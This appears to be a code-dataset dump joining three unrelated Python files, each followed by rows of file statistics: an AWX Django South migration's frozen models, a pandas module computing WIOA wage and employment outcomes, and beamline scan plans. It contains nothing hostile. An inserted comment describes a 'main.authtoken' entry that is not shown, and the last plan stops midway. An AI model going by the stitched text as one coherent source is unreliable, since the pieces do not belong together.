'limit': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'job\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'playbook': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'jobs'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Project']"}),
'result_stdout_file': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'result_traceback': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'start_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'new'", 'max_length': '20'}),
'verbosity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'blank': 'True'})
},
'main.jobevent': {
'Meta': {'ordering': "('pk',)", 'object_name': 'JobEvent'},
'changed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
'event': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'event_data': ('jsonfield.fields.JSONField', [], {'default': '{}', 'blank': 'True'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_events_as_primary_host'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.Host']", 'blank': 'True', 'null': 'True'}),
'hosts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'job_events'", 'blank': 'True', 'to': "orm['main.Host']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_events'", 'to': "orm['main.Job']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'children'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.JobEvent']", 'blank': 'True', 'null': 'True'}),
'play': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'task': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'})
},
'main.jobhostsummary': {
'Meta': {'ordering': "('-pk',)", 'unique_together': "[('job', 'host')]", 'object_name': 'JobHostSummary'},
'changed': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'dark': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_host_summaries'", 'to': "orm['main.Host']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_host_summaries'", 'to': "orm['main.Job']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'ok': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'processed': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'skipped': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'main.jobtemplate': {
'Meta': {'object_name': 'JobTemplate'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'cloud_credential': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_templates_as_cloud_credential+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.Credential']", 'blank': 'True', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'jobtemplate\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'credential': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_templates'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.Credential']", 'blank': 'True', 'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'extra_vars': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'forks': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'blank': 'True'}),
'host_config_key': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_templates'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Inventory']"}),
'job_tags': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'job_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'limit': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'jobtemplate\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '512'}),
'playbook': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_templates'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Project']"}),
'verbosity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'blank': 'True'})
},
'main.organization': {
'Meta': {'object_name': 'Organization'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'admins': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'admin_of_organizations'", 'blank': 'True', 'to': u"orm['auth.User']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'organization\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'organization\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '512'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'organizations'", 'blank': 'True', 'to': "orm['main.Project']"}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'organizations'", 'blank': 'True', 'to': u"orm['auth.User']"})
},
'main.permission': {
'Meta': {'object_name': 'Permission'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'permission\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'permissions'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Inventory']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'permission\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'permission_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'permissions'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Project']"}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'permissions'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Team']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'permissions'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"})
},
'main.profile': {
'Meta': {'object_name': 'Profile'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ldap_dn': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('awx.main.fields.AutoOneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
'main.project': {
'Meta': {'object_name': 'Project'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'project\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'credential': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'projects'", 'null': 'True', 'blank': 'True', 'to': "orm['main.Credential']"}),
'current_update': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'project_as_current_update+'", 'null': 'True', 'to': "orm['main.ProjectUpdate']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_update': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'project_as_last_update+'", 'null': 'True', 'to': "orm['main.ProjectUpdate']"}),
'last_update_failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'local_path': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'project\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '512'}),
'scm_branch': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '256', 'blank': 'True'}),
'scm_clean': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'scm_delete_on_next_update': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'scm_delete_on_update': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'scm_type': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '8', 'blank': 'True'}),
'scm_update_on_launch': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'scm_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'ok'", 'max_length': '32', 'null': 'True'})
},
'main.projectupdate': {
'Meta': {'object_name': 'ProjectUpdate'},
'_result_stdout': ('django.db.models.fields.TextField', [], {'default': "''", 'db_column': "'result_stdout'", 'blank': 'True'}),
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'cancel_flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'celery_task_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'projectupdate\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'job_cwd': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'job_env': ('jsonfield.fields.JSONField', [], {'default': '{}', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'projectupdate\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'project_updates'", 'to': "orm['main.Project']"}),
'result_stdout_file': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'result_traceback': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'start_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'new'", 'max_length': '20'})
},
'main.team': {
'Meta': {'unique_together': "[('organization', 'name')]", 'object_name': 'Team'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'team\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'team\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'teams'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'teams'", 'blank': 'True', 'to': "orm['main.Project']"}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'teams'", 'blank': 'True', 'to': u"orm['auth.User']"})
},
u'taggit.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
u'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_tagged_items'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_items'", 'to': u"orm['taggit.Tag']"})
}
}
complete_apps = ['main']
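# --- Editor's sketch (not part of the original migration) ---
# South's frozen ``models`` dict above is a serialized snapshot of every
# model this migration touches.  For orientation, the 'main.authtoken'
# entry maps back to a Django 1.x model roughly like the one below; the
# class is an illustration reconstructed from the frozen field options,
# not the project's actual source.
import datetime
from django.db import models as dj_models


class AuthTokenSketch(dj_models.Model):
    key = dj_models.CharField(max_length=40, primary_key=True)
    user = dj_models.ForeignKey('auth.User', related_name='auth_tokens')
    created = dj_models.DateTimeField(auto_now_add=True)
    modified = dj_models.DateTimeField(auto_now=True)
    expires = dj_models.DateTimeField(default=datetime.datetime.now)
    request_hash = dj_models.CharField(max_length=40, default='', blank=True)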
| 108.762332 | 271 | 0.574606 | 5,039 | 48,508 | 5.398492 | 0.047827 | 0.097048 | 0.16932 | 0.241885 | 0.901004 | 0.883836 | 0.868213 | 0.826747 | 0.779363 | 0.73139 | 0 | 0.005411 | 0.161891 | 48,508 | 445 | 272 | 109.006742 | 0.663707 | 0.005174 | 0 | 0.380282 | 0 | 0 | 0.607909 | 0.300379 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004695 | false | 0.007042 | 0.00939 | 0 | 0.021127 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
8ac5fc05900df8dfee7bf6105f1f3ee5d4a98edf | 4,752 | py | Python | abacus_tpot/outcomes/wioa.py | workforce-data-initiative/tpot-abacus | a5abf4af544693e0c58f7891785718e7bc606ed6 | ["Apache-2.0"] | 1 | 2019-09-09T20:52:49.000Z | 2019-09-09T20:52:49.000Z | abacus_tpot/outcomes/wioa.py | workforce-data-initiative/tpot-abacus | a5abf4af544693e0c58f7891785718e7bc606ed6 | ["Apache-2.0"] | 43 | 2018-02-11T11:24:18.000Z | 2022-02-22T05:32:16.000Z | abacus_tpot/outcomes/wioa.py | workforce-data-initiative/tpot-abacus | a5abf4af544693e0c58f7891785718e7bc606ed6 | ["Apache-2.0"] | null | null | null |
import pandas as pd
import numpy as np
from abacus_tpot import tpot_config
def median_wage_n_quarters_after_exit(wage_table, participants,
n_quarters):
"""
Return the median total wage for the Nth quarter after the
program exit date, for a list of participants.
"""
wage_table = wage_table[wage_table.participant_id.isin(participants)]
pd.options.mode.chained_assignment = None
wage_table['exit_quarter'] = pd.to_datetime(wage_table.exit_date.values).year * 4 +\
pd.to_datetime(wage_table.exit_date.values).quarter
wage_table['quarter'] = pd.to_datetime(wage_table.start_date.values).year * 4 +\
pd.to_datetime(wage_table.start_date.values).quarter
pd.options.mode.chained_assignment = 'warn'
wage_table = wage_table[wage_table.quarter ==
(wage_table.exit_quarter + n_quarters)]
wages_by_person = wage_table.groupby('participant_id').amount.sum()
# Check anonymization cutoff
if len(wages_by_person) < tpot_config.ANONYMIZATION_THRESHOLD:
return None
# Return the median
return np.nanmedian(wages_by_person.values)
def mean_wage_n_quarters_after_exit(wage_table, participants,
n_quarters):
"""
    Return the mean total wage for the Nth quarter after the
program exit date, for a list of participants.
"""
wage_table = wage_table[wage_table.participant_id.isin(participants)]
pd.options.mode.chained_assignment = None
wage_table['exit_quarter'] = pd.to_datetime(wage_table.exit_date.values).year * 4 +\
pd.to_datetime(wage_table.exit_date.values).quarter
wage_table['quarter'] = pd.to_datetime(wage_table.start_date.values).year * 4 +\
pd.to_datetime(wage_table.start_date.values).quarter
pd.options.mode.chained_assignment = 'warn'
wage_table = wage_table[wage_table.quarter ==
(wage_table.exit_quarter + n_quarters)]
wages_by_person = wage_table.groupby('participant_id').amount.sum()
# Check anonymization cutoff
if len(wages_by_person) < tpot_config.ANONYMIZATION_THRESHOLD:
return None
    # Return the mean
return np.nanmean(wages_by_person.values)
def employed_n_quarters_after_exit(wage_table, participants,
n_quarters):
"""
    Return the number employed (participants with nonzero total wages)
    for the Nth quarter after the
program exit date, for a list of participants.
"""
wage_table = wage_table[wage_table.participant_id.isin(participants)]
pd.options.mode.chained_assignment = None
wage_table['exit_quarter'] = pd.to_datetime(wage_table.exit_date.values).year * 4 +\
pd.to_datetime(wage_table.exit_date.values).quarter
wage_table['quarter'] = pd.to_datetime(wage_table.start_date.values).year * 4 +\
pd.to_datetime(wage_table.start_date.values).quarter
pd.options.mode.chained_assignment = 'warn'
wage_table = wage_table[wage_table.quarter ==
(wage_table.exit_quarter + n_quarters)]
wages_by_person = wage_table.groupby('participant_id').amount.sum()
# Check anonymization cutoff
if len(wages_by_person) < tpot_config.ANONYMIZATION_THRESHOLD:
return None
return len(wages_by_person.values[wages_by_person.values > 0])
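# --- Editor's sketch (not part of the original module) ---
# The three outcome functions above repeat the same preparation: map
# exit_date and start_date to an absolute quarter index (year * 4 +
# quarter) and keep only wage rows landing exactly n_quarters after the
# exit quarter.  A hypothetical helper factoring that shared logic out
# might look like this; note that working on an explicit .copy() avoids
# the chained-assignment warning the originals silence via pandas options.
def _wages_nth_quarter_after_exit(wage_table, participants, n_quarters):
    """Per-participant wage totals for the Nth quarter after exit."""
    wage_table = wage_table[wage_table.participant_id.isin(participants)].copy()
    # year * 4 + quarter is monotonically increasing, so "n quarters
    # after exit" becomes a plain integer offset.
    wage_table['exit_quarter'] = (pd.to_datetime(wage_table.exit_date.values).year * 4 +
                                  pd.to_datetime(wage_table.exit_date.values).quarter)
    wage_table['quarter'] = (pd.to_datetime(wage_table.start_date.values).year * 4 +
                             pd.to_datetime(wage_table.start_date.values).quarter)
    wage_table = wage_table[wage_table.quarter == (wage_table.exit_quarter + n_quarters)]
    return wage_table.groupby('participant_id').amount.sum()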
def total_participants(participant_table, participants):
"""
Return the total number of unique participants in a participant list
"""
participant_table = participant_table[participant_table.participant_id.isin(
participants)]
return participant_table.participant_id.unique().shape[0]
def total_exits(participant_table, participants):
"""
Return the total number of unique exits in a participant list
"""
participant_table = participant_table[participant_table.participant_id.isin(
participants)]
return participant_table.dropna(subset=['exit_date']).participant_id.unique().shape[0]
def total_completed(participant_table, participants):
"""
Return the total number of unique completers in a participant list
"""
participant_table = participant_table[participant_table.participant_id.isin(
participants)]
return participant_table[participant_table.exit_type.isin(['Graduated', 'Suspended', 'Terminated'])].\
participant_id.unique().shape[0]
def obtained_credentials(participant_table, participants):
"""
Return the total number of credential obtainers in a participant list
"""
participant_table = participant_table[participant_table.participant_id.isin(
participants)]
    return participant_table[participant_table.obtained_credentials == True].\
participant_id.unique().shape[0]
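# --- Editor's usage sketch (hypothetical data; not part of the module) ---
# Minimal smoke test of the metrics above.  Whether a number or None comes
# back depends on tpot_config.ANONYMIZATION_THRESHOLD, which suppresses
# results computed from too few people.
def _demo_outcomes():
    wages = pd.DataFrame({
        'participant_id': [1, 1, 2],
        'exit_date': ['2016-03-15', '2016-03-15', '2016-06-01'],
        'start_date': ['2016-07-01', '2016-08-01', '2016-10-01'],
        'amount': [5000.0, 5200.0, 4800.0],
    })
    # Both participants have wages two quarters after their exit quarter,
    # so the median of per-person sums (10200.0 and 4800.0) is returned,
    # or None if fewer people than the anonymization threshold remain.
    return median_wage_n_quarters_after_exit(wages, [1, 2], n_quarters=2)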
| 40.965517 | 106 | 0.717172 | 606 | 4,752 | 5.339934 | 0.135314 | 0.125155 | 0.125155 | 0.066749 | 0.895241 | 0.873918 | 0.865266 | 0.848269 | 0.832818 | 0.780902 | 0 | 0.002866 | 0.19234 | 4,752 | 115 | 107 | 41.321739 | 0.840281 | 0.147727 | 0 | 0.742424 | 0 | 0 | 0.037678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106061 | false | 0 | 0.045455 | 0 | 0.30303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8ad605aaaa3823b11f91aa3022cf183779028003 | 31,590 | py | Python | startup/users/30-user-Gomez_Oskar.py | NSLS-II-SMI/profile_collection | c1e2236a7520f605ac85e7591f05682add06357c | ["BSD-3-Clause"] | null | null | null | startup/users/30-user-Gomez_Oskar.py | NSLS-II-SMI/profile_collection | c1e2236a7520f605ac85e7591f05682add06357c | ["BSD-3-Clause"] | 13 | 2018-09-25T19:35:08.000Z | 2021-01-15T20:42:26.000Z | startup/users/30-user-Gomez_Oskar.py | NSLS-II-SMI/profile_collection | c1e2236a7520f605ac85e7591f05682add06357c | ["BSD-3-Clause"] | 3 | 2019-09-06T01:40:59.000Z | 2020-07-01T20:27:39.000Z |
def ex_situ_hardxray(t=1):
# samples = ['PLA2','PLA1','CON6','CON5', 'CON4','CON3','CON2','CON1',
# '05_Ca_1', '05_Ca_2', '05_UT_1', '05_UT_2', 'PLA6','PLA4','PLA3',
# ]
# samples = ['B5_1','B5_2','B5_3', 'B6_1','B6_2','B6_3','B7_1','B7_2','B7_3','B12_1','B12_2','B12_3']
# x_list = [45550, 41200, 35600, 25600, 20900, 15400, -1900, -7900, -14000, -24100, -28200, -32700, ]
# y_list = [-9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300]
# samples = ['A1_1','A1_2','A1_3', 'A1_4','A2_5','A2_6','A2_7','A2_8','A3_9','A3_10','A3_11','A3_12','A3_13','A3_14','A4_15', 'A4_16', 'A4_17', 'A4_19']
# x_list = [45950, 43250, 37250, 31650, 24400, 18850, 12500, 8000, -3400, -7300, -11300, -16800, -20900, -26400, -33000, -37400, -41900, -45200]
# y_list = [3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500]
# samples = ['C8_32', 'C8_33', 'C8_34', 'C8_35', 'C9_36', 'C9_37', 'C9_38', 'C9_39', 'C10_40', 'C10_41', 'C10_42', 'C10_43',
# 'C10_44', 'C10_45', 'C11_46', 'C11_47', 'C11_48', 'C11_49', 'C11_50']
# x_list = [43700, 38300, 34000, 27800, 20900, 16200, 12100, 7100, -2700, -6700, -10500, -15700, -20000,
# -24200, -29300, -32700, -36700, -41000, -45000]
# y_list = [3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700,
# 3700, 3700, 3700, 3700, 3700, 3700]
samples = ['D13_51','D13_52','D13_53','D14_54','D14_55','D14_56','D15_57','D15_58','D15_59','D16_60','D16_61','D16_62','D16_63','D16_64',
'D17_65','D17_66','D17_67']
x_list = [43700, 38400, 34000, 25200, 20000, 15400, 6700, 2500, -2300, -6800, -14000, -19000, -23300, -28500,
-34700, -39300, -43600]
y_list = [-9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880,
-9880, -9880, -9880]
# Detectors, motors:
dets = [pil1M, pil300KW]
waxs_range = np.linspace(13, 0, 3)
ypos = [0, 400, 3]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
det_exposure_time(t,t)
for wa in waxs_range:
yield from bps.mv(waxs, wa)
for sam, x, y in zip(samples, x_list, y_list):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
name_fmt = '{sam}_wa{waxs}'
sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
yield from bp.rel_scan(dets, piezo.y, *ypos)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
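# --- Editor's sketch (not part of the original macro file) ---
# Each ex_situ_* plan in this file repeats one pattern: step the WAXS arm,
# then for every sample move the piezo stage, tag the run, and do a short
# relative scan in y.  A hypothetical generic plan capturing that pattern
# (it reuses the beamline globals waxs, piezo, sample_id, bps, and bp
# assumed throughout this file) could look like:
def scan_sample_grid(dets, samples, x_list, y_list, waxs_range, ypos,
                     name_fmt='{sam}_wa{waxs}', user_name='OS'):
    assert len(samples) == len(x_list) == len(y_list), 'coordinate/sample length mismatch'
    for wa in waxs_range:
        yield from bps.mv(waxs, wa)
        for sam, x, y in zip(samples, x_list, y_list):
            # Move both piezo axes in one step, then scan y relative to
            # the new position.
            yield from bps.mv(piezo.x, x, piezo.y, y)
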